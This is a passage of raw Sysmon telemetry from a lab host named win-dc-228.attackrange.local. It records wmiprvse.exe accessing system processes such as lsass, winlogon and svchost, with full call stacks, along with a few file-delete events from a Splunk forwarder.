RT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204333Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2B00-00000000AD01}2540C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204332Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204331Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-843F-603E-2700-00000000AD01}3004C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204330Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8439-603E-2500-00000000AD01}2856C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204329Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-8430-603E-1800-00000000AD01}1928C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204328Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1CCA6276EF25560A2D69A9963A6B940F,SHA256=2784CF1E4DE49F565CCCC558C3C32F38526387053B5C2C3C954353E256F62AE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204327Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CE05C0F3300680EC221C4F2382E8842,SHA256=9BA12EF8B918F94ABE84793F024D48F1020D63CA7B0DC7D7EE623D8B0346C940,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204326Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1700-00000000AD01}1452C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204325Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1600-00000000AD01}1340C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204324Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204323Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204322Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204321Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204320Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204319Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204318Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204317Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204316Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204315Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204314Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204313Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.056{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204312Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.040{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 